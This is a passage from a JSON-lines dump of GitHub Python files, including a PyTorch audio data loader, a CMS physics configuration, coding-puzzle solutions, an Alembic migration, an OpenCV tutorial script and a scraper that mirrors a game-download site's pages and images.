key that doesn't expire.\"\"\"\n\n db = bx.Db()\n db.put('hello', 'world')\n assert db.exp('hello') is None\n\n\ndef test_expiring():\n \"\"\"Tests db.exp, with a key that does expire.\"\"\"\n\n db = bx.Db()\n db.put('hello', 'world', 2000)\n now = time()\n assert db.exp('hello') > now\n\n\ndef test_malformed():\n \"\"\"Tests db.exp, with a key that doesn't exist.\"\"\"\n\n db = bx.Db()\n assert_raises(KeyError, db.exp, 'hello')\n","repo_name":"iblislin/bx-python","sub_path":"tests/test_exp.py","file_name":"test_exp.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13437264029","text":"import torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom .cache import CachedDataset\nfrom .datasets import (\n FixedLengthDataset,\n TransformedDataset,\n VariableLengthDataset,\n)\nfrom .features import MelSpectrogramExtractor, Resampler, SpectrogramExtractor\n\n\nclass MappedDataLoader(DataLoader):\n def __init__(self, dataset, device=None, **kwargs):\n super().__init__(dataset, **kwargs)\n\n if device is not None:\n self.to(device)\n\n def to(self, device):\n self.device = device\n\n def __iter__(self):\n def _to(data):\n if isinstance(data, (tuple, list)):\n return tuple(_to(item) for item in data)\n return data.to(self.device)\n\n return map(_to, super().__iter__())\n\n\nclass DataTransformer(MappedDataLoader):\n def __init__(self, dataset, transforms, device=None, **kwargs):\n if not isinstance(transforms, (tuple, list)):\n self.transforms = [transforms]\n else:\n self.transforms = list(transforms)\n\n # Invoked later because of to()\n super().__init__(dataset, device, **kwargs)\n\n def to(self, device):\n self.device = device\n for transform in self.transforms:\n if isinstance(transform, nn.Module):\n transform.to(device)\n\n def transform(self, data):\n is_tuple = isinstance(data, tuple)\n for T in self.transforms:\n if is_tuple:\n output = T(*data)\n if not isinstance(output, tuple):\n output = (output,)\n data = output + data[len(output):]\n else:\n data = T(data)\n if isinstance(data, tuple):\n data = data[0]\n return data\n\n def __iter__(self):\n return map(self.transform, super().__iter__())\n\n\nclass IterationBasedLoader:\n def __init__(self, loader, n_iterations):\n self.loader = loader\n self.n_iterations = n_iterations\n self._iter = loader.__iter__()\n\n def to(self, device):\n self.loader.to(device)\n\n def __iter__(self):\n for i in range(self.n_iterations):\n try:\n batch = next(self._iter)\n except StopIteration:\n self._iter = self.loader.__iter__()\n batch = next(self._iter)\n\n yield batch\n\n def __len__(self):\n return self.n_iterations\n\n\nclass DataLoaderFactory:\n def __init__(self,\n sample_rate=None,\n block_length=None,\n hop_length=None,\n features=None,\n labeler='default',\n batch_size=1,\n n_workers=0,\n cache_features=False,\n ):\n self.sample_rate = sample_rate\n self.block_length = block_length\n self.hop_length = hop_length\n self.features = features\n self.labeler = labeler\n self.batch_size = batch_size\n self.n_workers = n_workers\n self.cache_features = cache_features\n\n self._waveform_transforms = []\n self._feature_transforms = []\n\n def training_data_loader(self, subset):\n return self._data_loader(subset, shuffle=True)\n\n def validation_data_loader(self, subset):\n return self._data_loader(subset)\n\n def test_data_loader(self, subset):\n return self._data_loader(subset)\n\n def feature_extractor(self, subset):\n fv_params = 
self.features.copy()\n method = fv_params.pop('method')\n if method == 'mel':\n new_sr = self.sample_rate or subset.dataset.sample_rate\n return MelSpectrogramExtractor(new_sr, **fv_params)\n if method == 'spectrogram':\n return SpectrogramExtractor(**fv_params)\n\n raise ValueError(f\"Unknown feature extraction method '{method}'\")\n\n def add_waveform_transform(self, transform, cacheable=False):\n self._waveform_transforms.append((transform, cacheable))\n\n def add_feature_transform(self, transform, cacheable=False):\n self._feature_transforms.append((transform, cacheable))\n\n add_tf_transform = add_feature_transform\n\n def waveform_transforms(self, subset=None):\n cacheable, non_cacheable = self._split(self._waveform_transforms)\n if subset is None:\n return cacheable, non_cacheable\n\n # Add transform for resampling if applicable\n orig_sr = subset.dataset.sample_rate\n new_sr = self.sample_rate or orig_sr\n if new_sr != orig_sr:\n cacheable.insert(0, Resampler(orig_sr, new_sr))\n\n return cacheable, non_cacheable\n\n def feature_transforms(self):\n return self._split(self._feature_transforms)\n\n tf_transforms = feature_transforms\n\n def transforms(self, subset):\n cacheable, non_cacheable = self.waveform_transforms(subset)\n if self.features is None:\n return cacheable, non_cacheable\n\n # Add extractor and subsequent transforms to the correct list(s)\n extractor = self.feature_extractor(subset)\n cacheable_, non_cacheable_ = self.feature_transforms()\n if len(non_cacheable) > 0:\n non_cacheable.append(extractor)\n non_cacheable += cacheable_ + non_cacheable_\n else:\n cacheable.append(extractor)\n cacheable += cacheable_\n non_cacheable += non_cacheable_\n\n return cacheable, non_cacheable\n\n def _data_loader(self, subset, **kwargs):\n # Determine which Dataset class to use\n if subset.dataset.clip_duration is None:\n cls = VariableLengthDataset\n else:\n cls = FixedLengthDataset\n\n # Determine the transforms to be applied (if any)\n cacheable, non_cacheable = self.transforms(subset)\n if self.cache_features:\n loader_transforms = []\n else:\n loader_transforms = cacheable + non_cacheable\n\n # Instantiate Dataset\n dataset = cls(subset, self.block_length, self.hop_length, self.labeler)\n if self.cache_features:\n if len(cacheable) > 0:\n dataset = CachedDataset(TransformedDataset(dataset, cacheable))\n if len(non_cacheable) > 0:\n dataset = TransformedDataset(dataset, non_cacheable)\n\n loader = DataTransformer(\n dataset,\n loader_transforms,\n batch_size=self.batch_size,\n num_workers=self.n_workers,\n pin_memory=True,\n **kwargs,\n )\n return loader\n\n def _split(self, transforms):\n # Determine the cut-off point\n offset = 0\n while offset < len(transforms) and transforms[offset][1]:\n offset += 1\n\n transforms = next(zip(*transforms), [])\n cacheable = transforms[:offset]\n non_cacheable = transforms[offset:]\n return cacheable, non_cacheable\n","repo_name":"tqbl/jaffalearn","sub_path":"jaffalearn/data/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40134174530","text":"import FWCore.ParameterSet.Config as cms\r\n\r\nfrom DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer\ntopDiLeptonDQM = DQMEDAnalyzer('TopDiLeptonDQM',\r\n\r\n moduleName = cms.untracked.string('Physics/Top/DiLepton'),\r\n fileOutput = cms.bool(False),\r\n outputFile = cms.untracked.string('DiLeptonEvents.txt'),\r\n ### \r\n TriggerResults = 
cms.InputTag('TriggerResults','','HLT'),\r\n    hltPaths = cms.vstring('HLT_Mu3','HLT_Mu5','HLT_Mu9','HLT_Mu15','HLT_IsoMu3','HLT_IsoMu9','HLT_DoubleMu0','HLT_DoubleMu3',\r\n                           'HLT_Ele10_LW_L1R','HLT_Ele15_LW_L1R','HLT_Ele20_LW_L1R'),\r\n    ### \r\n    hltPaths_sig = cms.vstring('HLT_Mu9', 'HLT_Mu9', 'HLT_IsoMu3', 'HLT_DoubleMu3', 'HLT_DoubleMu3', 'HLT_DoubleMu3'),\r\n    hltPaths_trig = cms.vstring('HLT_Mu3', 'HLT_Mu5', 'HLT_Mu3', 'HLT_Mu3', 'HLT_IsoMu3', 'HLT_DoubleMu0'),\r\n    ### \r\n    vertexCollection = cms.InputTag('offlinePrimaryVertices'),\r\n    vertex_X_cut = cms.double( 1.0 ),\r\n    vertex_Y_cut = cms.double( 1.0 ),\r\n    vertex_Z_cut = cms.double( 20.0 ),\r\n    ### \r\n    muonCollection = cms.InputTag('muons'),\r\n    muon_pT_cut = cms.double( 1.0 ),\r\n    muon_eta_cut = cms.double( 2.4 ),\r\n    muon_iso_cut = cms.double( 0.2 ),\r\n    ### \r\n    elecCollection = cms.InputTag('gedGsfElectrons'),\r\n    elec_pT_cut = cms.double( 5.0 ),\r\n    elec_eta_cut = cms.double( 2.4 ),\r\n    elec_iso_cut = cms.double( 0.2 ),\r\n    elec_emf_cut = cms.double( 0.1 ),\r\n    ### \r\n    MassWindow_up = cms.double( 106. ),\r\n    MassWindow_down = cms.double( 76. )\r\n\r\n)\r\n\r\ntopDiLeptonAnalyzer = cms.Sequence(topDiLeptonDQM)\r\n","repo_name":"cms-sw/cmssw","sub_path":"DQM/Physics/python/topDiLeptonDQM_cfi.py","file_name":"topDiLeptonDQM_cfi.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"15900951719","text":"\"\"\"\nSuppose there is an array whose i-th element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (buy and sell the stock multiple times). However, you may not engage in multiple transactions at the same time (you must sell the stock before buying again).\n\"\"\"\n\"\"\"\nApproach:\nIf the next day's price is higher than the current day's, sell; after selling you can immediately buy back in.\n\"\"\"\nclass Solution(object):\n    def maxProfit(self, prices):\n        \"\"\"\n        :type prices: List[int]\n        :rtype: int\n        \"\"\"\n        if len(prices) < 1:\n            return 0\n        res = 0\n        for i in range(len(prices)-1):\n            if prices[i] < prices[i+1]:\n                res += prices[i+1] - prices[i]\n        return res","repo_name":"alexkie007/offer","sub_path":"LeetCode/动态规划/122. 买卖股票的最佳时机2.py","file_name":"122. 买卖股票的最佳时机2.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19608126839","text":"\"\"\"initial database migration\n\nRevision ID: 5f62b64a1ded\nRevises: \nCreate Date: 2020-05-24 20:03:56.164393\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '5f62b64a1ded'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n    op.create_table('customer',\n    sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),\n    sa.Column('created_date', sa.DateTime(), nullable=False),\n    sa.Column('contact', sa.String(length=50), nullable=True),\n    sa.Column('name', sa.String(length=200), nullable=True),\n    sa.Column('description', sa.Text(), nullable=True),\n    sa.Column('status', sa.Enum('prospective', 'current', 'nonActive', name='status'), nullable=True),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('id')\n    )\n    op.create_table('note',\n    sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),\n    sa.Column('customer_id', postgresql.UUID(as_uuid=True), nullable=True),\n    sa.Column('value', sa.Text(), nullable=True),\n    sa.ForeignKeyConstraint(['customer_id'], ['customer.id'], ),\n    sa.PrimaryKeyConstraint('id'),\n    sa.UniqueConstraint('id')\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('note')\n    op.drop_table('customer')\n    # ### end Alembic commands ###\n","repo_name":"jbalintac/bd-fsd-customerinfo","sub_path":"api/migrations/versions/5f62b64a1ded_initial_database_migration.py","file_name":"5f62b64a1ded_initial_database_migration.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"870972069","text":"def longest_consec(strarr, k):\n    if len(strarr) == 0 or k < 0 or k > len(strarr):\n        return \"\"\n    final_string = list()\n    temp_string = list()\n    for i in range(k, len(strarr)+1):\n        del temp_string[:]\n        for y in range(i - k, i):\n            temp_string.append(strarr[y])\n        if len(\"\".join(temp_string)) > len(\"\".join(final_string)):\n            final_string = temp_string.copy()\n\n    return \"\".join(final_string)\n\nprint(longest_consec([\"ejjjjmmtthh\", \"zxxuueeg\", \"aanlljrrrxx\", \"dqqqaaabbb\", \"oocccffuucccjjjkkkjyyyeehh\"], 1))\n","repo_name":"sLevasseur/Codewars_Training","sub_path":"Consecutive strings.py","file_name":"Consecutive strings.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3569112009","text":"import cv2 as cv2\nimport matplotlib.pyplot as plt\nfrom IPython.display import Image\n\ncb_img = cv2.imread(\"checkerboard_18x18.png\", 0)\n\nplt.imshow(cb_img, cmap='gray')\nprint(cb_img)\n\nprint(cb_img[0, 0])\n\nprint(cb_img[0, 6])\n\ncb_img_copy = cb_img.copy()\ncb_img_copy[2, 2] = 200\ncb_img_copy[2, 3] = 200\ncb_img_copy[3, 2] = 200\ncb_img_copy[3, 3] = 200\n\n# Same as above\n# cb_img_copy[2:3,2:3] = 200\n\nplt.imshow(cb_img_copy, cmap='gray')\nprint(cb_img_copy)\n\nimg_NZ_bgr = cv2.imread(\"New_Zealand_Boat.jpg\", cv2.IMREAD_COLOR)\nimg_NZ_rgb = img_NZ_bgr[:, :, ::-1]\n\nplt.imshow(img_NZ_rgb)\n\ncropped_region = img_NZ_rgb[200:400, 300:600]\nplt.imshow(cropped_region)\n\nresized_cropped_region_2x = cv2.resize(cropped_region, None, fx=2, fy=2)\nplt.imshow(resized_cropped_region_2x)\n\ndesired_width = 100\ndesired_height = 200\ndim = (desired_width, desired_height)\n\n# Resize the cropped region to the specified dimensions\nresized_cropped_region = cv2.resize(cropped_region, dsize=dim, interpolation=cv2.INTER_AREA)\nplt.imshow(resized_cropped_region)\n\n# Method 2: Using 'dsize'\ndesired_width = 100\naspect_ratio = desired_width / cropped_region.shape[1]\ndesired_height = int(cropped_region.shape[0] * aspect_ratio)\ndim = (desired_width, desired_height)\n\n# Resize image\nresized_cropped_region = 
cv2.resize(cropped_region, dsize=dim, interpolation=cv2.INTER_AREA)\nplt.imshow(resized_cropped_region)\n\n# Swap channel order\nresized_cropped_region_2x = resized_cropped_region_2x[:, :, ::-1]\n\n# Save resized image to disk\ncv2.imwrite(\"resized_cropped_region_2x.png\", resized_cropped_region_2x)\n\n# Display the cropped and resized image\nImage(filename='resized_cropped_region_2x.png')\n# Swap channel order\ncropped_region = cropped_region[:, :, ::-1]\n\n# Save cropped 'region'\ncv2.imwrite(\"cropped_region.png\", cropped_region)\n\n# Display the cropped and resized image\nImage(filename='cropped_region.png')\n\nimg_NZ_rgb_flipped_horz = cv2.flip(img_NZ_rgb, 1)\nimg_NZ_rgb_flipped_vert = cv2.flip(img_NZ_rgb, 0)\nimg_NZ_rgb_flipped_both = cv2.flip(img_NZ_rgb, -1)\n\n# Show the images\nplt.figure(figsize=[18, 5])\nplt.subplot(141);\nplt.imshow(img_NZ_rgb_flipped_horz);\nplt.title(\"Horizontal Flip\");\nplt.subplot(142);\nplt.imshow(img_NZ_rgb_flipped_vert);\nplt.title(\"Vertical Flip\");\nplt.subplot(143);\nplt.imshow(img_NZ_rgb_flipped_both);\nplt.title(\"Both Flipped\");\nplt.subplot(144);\nplt.imshow(img_NZ_rgb);\nplt.title(\"Original\");\n\nplt.show()\n","repo_name":"Rvistix/OpenCV_Python_tutorial","sub_path":"02_Basic_Image_Manipulation/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16916698446","text":"import requests\nimport os\nimport sys\nfrom urllib.parse import urlparse\nfrom bs4 import BeautifulSoup\n\n\nroot = \"c:/webscrape/pcgames-download.com/\"\n\n\n\n'''\n====================================================\n\n\tSystem Methods\n\n====================================================\n'''\n\n\ndef printc( str ):\n\tprint( str, end='', flush=True)\n\n\ndef printl(list):\n\tfor i in list:\n\t\tprint(i)\n\n\n'''\n====================================================\n\n\tCLASS WEB\n\n====================================================\n'''\n\nclass web:\n\n\theaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\n\tdef __init__(self, urlDomain = \"\", localPath = \"\", code = \"\", soup = None ):\n\n\t\tself.urlDomain = urlDomain\n\t\tself.localPath = localPath\n\t\tself.code = code\n\t\tself.soup = soup \n\n\n\t#------------------------------------------------------\n\t#\tSoup\n\t#------------------------------------------------------\n\n\tdef makeSoup( self ):\n\t\tprint(\"Making Soup... \")\n\t\tself.soup = BeautifulSoup( self.code, 'html.parser')\n\n\tdef resetSoup( self ):\n\t\tprint(\"\\nResetting to Original Soup... \\n\")\n\t\tself.soup = BeautifulSoup( self.code, 'html.parser')\n\n\t#------------------------------------------------------\n\t#\tSetters\n\t#------------------------------------------------------\n\n\tdef setSoup( self, soup ):\n\t\tself.soup = soup\n\n\n\n\t#------------------------------------------------------\n\t#\tGetters\n\t#------------------------------------------------------\n\n\tdef getHtmlCode( self, url):\n\t\t\n\t\tprint(\"Downloading Code... 
\")\n\t\t\n\t\ttry:\t\t\t\n\t\t\tself.code = requests.get(url, headers = self.headers).text\n\t\t\tself.makeSoup()\n\n\t\texcept requests.exceptions.Timeout as e:\n\t\t\tprint(\"Error Timeout: \", e)\n\t\texcept requests.exceptions.ConnectionError as e:\n\t\t\tprint (\"Error Connecting: \",e)\n\t\texcept requests.exceptions.TooManyRedirects as e:\n\t\t\tprint(\"Error, too many redirects\", e)\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t print(\"Http Error\", e)\n\t\texcept requests.exceptions.RequestException as e:\n\t\t\t# catastrophic error. bail.\n\t\t\tprint(e)\n\t\t\tsys.exit(1)\n\t\t\n\n\n\tdef getImgData(self, url):\n\t\t\n\t\t# get the url root ej: \"https://pcgames-download.com/\"\n\t\turlRoot = self.getDomainUrl( url )\n\n\t\turl = url.replace( urlRoot ,\"\")\n\t\tarray = url.split(\"/\")\n\t\tfolders = root +'/'.join( array[:-1] ) + \"/\"\n\t\tfilename = array[-1:][0]\n\t\t\n\t\tif \"?\" in filename: \n\t\t\tfilename = filename.split(\"?\")[0]\n\n\t\treturn (folders,filename)\n\n\n\tdef getDomainUrl(self, url):\n\t\tdata = urlparse( url )\n\t\treturn data.scheme + \"://\" + data.netloc + \"/\"\n\n\n\tdef getSoup(self):\n\t\treturn self.soup\t\t\n\n\tdef getCode(self):\n\t\treturn self.code\n\n\n\t#------------------------------------------------------\n\t#\tUtils\n\t#------------------------------------------------------\n\n\n\tdef convertToLocal( self, data ):\t\t\n\t\treturn data.replace( self.getDomainUrl( self.urlDomain ), self.localPath )\n\n\tdef createFolder( self, name ):\n\t if not os.path.exists( name ):\n\t os.makedirs( name )\n\n\t\n\t#------------------------------------------------------\n\t#\tDownloaders\n\t#------------------------------------------------------\n\n\tdef writeHtml( self, data, folder, name ):\n\n\t\tprint(\"Saving HTML... \")\n\n\t\tdata = self.convertToLocal( str( data ) )\n\n\t\tf = open( folder + name, \"w\", encoding=\"utf-8\")\n\t\tf.write( data )\n\t\tf.close()\n\n\n\tdef writeFile(self, url, folder, name ):\n\t\t\n\t\tprint(\"--> Saving File: \" + url)\n\n\t\ttry:\n\t\t\t\n\t\t\tfile = requests.get( url, headers = self.headers ).content\t\t\t\n\t\t\twith open( folder + name ,\"wb\") as f:\n\t\t\t\tf.write( file )\n\t\t\t\tf.close()\n\n\t\texcept requests.exceptions.Timeout as e:\n\t\t\tprint(\"Error Timeout: \", e)\n\t\texcept requests.exceptions.ConnectionError as e:\n\t\t\tprint (\"Error Connecting: \",e)\n\t\texcept requests.exceptions.TooManyRedirects as e:\n\t\t\tprint(\"Error, too many redirects\", e)\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t print(\"Http Error\", e)\n\t\texcept requests.exceptions.RequestException as e:\n\t\t\t# catastrophic error. 
bail.\n\t\t\tprint(e)\n\t\t\tsys.exit(1)\n\n\n\n\n\tdef saveHtml( self, folder, name ):\n\t\tself.createFolder( folder )\t\t\n\t\tself.writeHtml( self.soup, folder, name)\n\n\n\tdef saveImages( self ):\t\t\t\n\n\t\tsoupWrapper = self.soup.findAll(\"div\", {\"class\": \"wrapper\"})[0]\t\n\n\t\tfor link in soupWrapper.select(\"img\"):\n\t\t\t\n\t\t\turlImg = link[\"src\"]\n\t\t\tfolderImg,fileName = self.getImgData(urlImg)\t\t\t\n\n\t\t\t# If file not exist\n\t\t\tif not os.path.isfile(folderImg + fileName ):\n\t\t\t\tself.createFolder( folderImg )\n\t\t\t\tself.writeFile( urlImg, folderImg, fileName )\n\n\n\t\t\t\n\tdef saveWeb( self, folderHtml, nameHtml ):\n\t\t\t\t\n\t\tdownloadHtml( folderHtml, nameHtml )\t\n\t\tdownloadImages()\n\n'''\n====================================================\n\n\tEND CLASS WEB\n\n====================================================\n'''\n\n\n\n'''\n====================================================\n\n\tCLASS pcGamesDownloads EXTEND Web\n\n====================================================\n'''\n\n# Extend for https://pcgames-download.com/\nclass pcGamesPages(web):\n\t\n\tdef __init__(self, urlDomain = \"\", localPath = \"\"):\n\t\tself.urlDomain = urlDomain\n\t\tself.localPath = localPath\n\t\n\n\t#------------------------------------------------------\n\t#\tHTML EDITIONS\n\t#------------------------------------------------------\n\n\tdef deleteTags( self ):\n\t\t\n\t\tprint(\"Editing -> Deleting Tags... \")\n\n\t\tlistDelete = []\n\n\t\t# Delete scripts tags, analytics and pops BY TEXT inside tag\t\n\t\tlistDelete.append( [self.soup.find(lambda tag:tag.name==\"script\" and \"GoogleAnalyticsObject\" in tag.text)] )\n\t\tlistDelete.append( [self.soup.find(lambda tag:tag.name==\"script\" and \"_pop\" in tag.text)] )\n\n\t\t# Delete TAG google fonts CSS\n\t\tlistDelete.append( self.soup.select(\"link[id=baskerville_googleFonts-css]\") )\t\n\n\t\t# Delete Content Layout\n\t\tlistDelete.append( self.soup.findAll(\"h3\", {\"class\": \"blog-description\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"navigation\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"metaslider\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"sidebar\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"post-meta-container\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"comments\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"iframe\", {\"id\": \"mgiframe\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"footer\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"credits\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"yarpp-related\"}) )\t\t\n\t\tlistDelete.append( self.soup.findAll(\"img\", {\"class\": \"avatar\"}) )\n\n\t\t\n\t\t# DELETING TAGS\n\t\tfor listItems in listDelete:\n\t\t\tfor tag in listItems:\n\t\t\t\ttag.decompose()\n\n\n\n\n\t\t\n\n\tdef editNumNav( self ):\n\n\t\tprint(\"Editing -> Changing numbers nav menu links... \")\n\n\t\tnav = self.soup.find(\"div\", {\"class\": \"wp-pagenavi\"})\t\n\t\tbuttonsList = nav.findAll(\"a\")\n\n\t\tfor a in buttonsList:\t\t\t\n\n\t\t\tif not \"page\" in a['href']:\n\t\t\t\taUrl = root + \"page1.html\"\n\t\t\telse:\n\t\t\t\taUrl = \"page\"+a['href'].split(\"/\")[-2] + \".html\"\n\n\t\t\ta['href'] = aUrl\n\n\n\n\tdef editPostUrl( self ):\n\t\t\n\t\tprint(\"Editing -> Changing post games links... 
\")\n\n\t\tpostList = self.soup.find(\"div\", {\"class\": \"posts\"})\n\t\tbuttonsPosts = postList.findAll(\"a\")\n\n\t\tfor a in buttonsPosts:\n\t\t\taUrl = a['href'][:-1] + \".html\"\n\t\t\ta['href'] = aUrl\n\t\t\n\t\n\n\t#------------------------------------------------------\n\t#\tGetters and Setters\n\t#------------------------------------------------------\n\n\tdef getUrlPosts( self ):\n\t\treturn self.soup.findAll(\"a\", {\"class\": \"more-link\"})\n\n\n\tdef setNumberPage( self, n):\n\t\tself.nPage = n\n\n\t\n\t#------------------------------------------------------\n\t#\tSaving Posts\n\t#------------------------------------------------------\n\n\tdef savePosts( self ):\n\n\t\tappPost = pcGamesPages( urlDomain = \"https://pcgames-download.com/\", localPath = \"../../\")\n\n\t\tpagesList = self.getUrlPosts()\n\t\t\n\n\t\tfor gameUrlSrc in pagesList:\n\n\t\t\tgameUrl = gameUrlSrc[\"href\"]\t\t\t\n\t\t\tgameUrlData = gameUrl.replace(\"https://pcgames-download.com/\",\"\").split(\"/\")\n\t\t\t\n\t\t\tfolderPost = gameUrlData[0] + \"/\" + gameUrlData[1] + \"/\"\n\t\t\tnamePost = gameUrlData[2] + \".html\"\n\t\t\t\n\t\t\tprint( \"-\"*30+\"\\n[\"+self.nPage+\"] -> Downloading post: \" + namePost)\n\n\n\t\t\t# Create another instance for post pages\n\t\t\tappPost.getHtmlCode( gameUrl )\n\t\t\tappPost.deleteTags()\n\t\t\tappPost.saveHtml( root + folderPost, namePost )\t\n\t\t\tappPost.saveImages( )\t\n\n\t\t\tprint( \"-\"*30)\n\n\n\n'''\n====================================================\n\n\tEND CLASS PcGamesDownloads\n\n====================================================\n'''\n\n\n\n\n\ndef initCustomPcGames( ini, fin, mult):\n\n\n\tini = ini\n\tfin = fin\t\n\n\n\tdef pInit():\n\t\tprint(\"\\n\"*2 +\"=\"*80+\"\\n\" + \"\\n STARTED\\n\\n\" + \"=\"*80+ \"\\n\" )\n\t\n\tdef pEnd():\n\t\tprint(\"\\n\"*5 + \"=\"*80+\"\\n\" + \"\\n END\\n\\n\" + \"=\"*80 + \"\\n\")\n\n\tdef pPage(str):\n\t\tprint(\"\\n\"*3+\"=\"*80+\"\\n\" + \"Working page: \" + str + \"\\n\" + \"=\"*80)\n\n\n\n\tdef customSoup(soup):\n\t\tsoupPosts = soup.find(\"div\", {\"class\": \"posts\"})\n\t\tsoupPosts.clear() # Delete content from sopupTag\n\t\treturn soupPosts\n\n\n\tdef appSinlePage():\n\n\n\t\tapp = pcGamesPages( urlDomain = \"https://pcgames-download.com/\", localPath = \"\" )\n\n\n\t\tfor i in range(ini,fin+1):\n\t\t\n\t\t\ti = str(i)\n\t\t\turl = 'https://pcgames-download.com/page/' + i + '/'\n\t\t\tnamePage = \"page\" + i + \".html\"\n\n\t\t\tpPage(namePage)\t\n\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# Scraping Procces\n\t\t\t#-------------------------------------------------------\n\n\t\t\t# Get html code from web\n\t\t\tapp.getHtmlCode( url )\t\t\t\n\n\t\t\t'''\n\t\t\t# Editing html\n\t\t\tapp.deleteTags()\t\t\n\t\t\tapp.editPostUrl()\n\t\t\tapp.editNumNav()\n\n\n\t\t\t# Save html and images\n\t\t\tapp.saveHtml( root, namePage)\n\t\t\tapp.saveImages()\n\n\t\t\t'''\n\t\t\t\n\t\t\t# Download all Post per page\n\t\t\t#app.resetSoup() # Reseting soup changes\n\t\t\tapp.setNumberPage(str(i))\t\t\t\n\t\t\tapp.savePosts()\n\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# END Scraping Procces\n\t\t\t#-------------------------------------------------------\n\n\n\n\tdef appMultiplePageBy( mult ):\n\n\t\tmult = mult\n\t\t\n\t\tbigList = []\n\n\t\tapp = pcGamesPages( urlDomain = \"https://pcgames-download.com/\", localPath = \"\" )\n\n\t\tfor i in range(ini,fin+1):\n\t\t\n\t\t\ti = str(i)\n\t\t\turl = 'https://pcgames-download.com/page/' + i + 
'/'\n\t\t\tnamePage = \"page\" + i + \".html\"\n\n\t\t\tpPage(namePage)\t\n\n\n\t\t\t\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# Scraping Process\n\t\t\t#-------------------------------------------------------\n\n\t\t\t# Get html code from web\n\t\t\tapp.getHtmlCode( url )\n\n\t\t\t# save images\n\t\t\tapp.saveImages()\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# END Scraping Process\n\t\t\t#-------------------------------------------------------\n\n\n\t\t\tbigList.append( app.getSoup().findAll(\"div\", {\"class\": \"post-container\"}) )\n\n\n\t\t\t# Multiples of mult\n\t\t\tif (int(i)%mult) == 0 or int(i) == fin:\n\n\t\t\t\tprint(\"Editing html data...\")\n\n\t\t\t\tnamePage = \"big\" + i + \".html\"\n\t\t\t\tsoupPosts = app.getSoup().find(\"div\", {\"class\": \"posts\"})\n\t\t\t\tnav = app.getSoup().find(\"div\", {\"class\": \"wp-pagenavi\"})\n\n\t\t\t\tsoupPosts.clear() # Delete content from soupTag\n\n\n\t\t\t\tfor itemBiglist in bigList:\n\t\t\t\t\tfor itemPageBotton in itemBiglist:\n\t\t\t\t\t\tsoupPosts.append(itemPageBotton)\n\n\n\n\t\t\t\tnav.clear() # Delete content from nav\n\n\t\t\t\tfor j in range(ini,fin+1):\n\n\t\t\t\t\tj = str(j)\n\n\t\t\t\t\tif (int(j)%mult) == 0 or int(j) == fin:\n\t\t\t\t\t\tif j == i:\n\t\t\t\t\t\t\tnav.append( BeautifulSoup('<span class=\"current\">'+j+'</span>', 'html.parser') )\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnav.append( BeautifulSoup('<a href=\"big'+j+'.html\">'+j+'</a>', 'html.parser') )\n\n\t\t\t\t\n\n\t\t\t\t# Editing html\n\t\t\t\tapp.deleteTags()\t\t\n\t\t\t\tapp.editPostUrl()\t\t\t\t\n\n\t\t\t\t# Save html and images\n\t\t\t\tapp.saveHtml( root, namePage)\n\n\t\t\t\t\n\t\t\t\tbigList = []\n\n\t\t\t\t\t\n\n\n\t\n\n\n\n\tpInit()\n\n\tappSinglePage()\n\t#appMultiplePageBy(mult)\n\n\tpEnd()\n\n\n\n\t\n\n\ninitCustomPcGames(228,296,10) #( start, end, multiples ) => multiples is used to merge pages together\n","repo_name":"pixeles3ds/code","sub_path":"Python/Python Scripts/edScripts/WebScraping/webScrape.py","file_name":"webScrape.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"552925301","text":"class Solution:\n    def 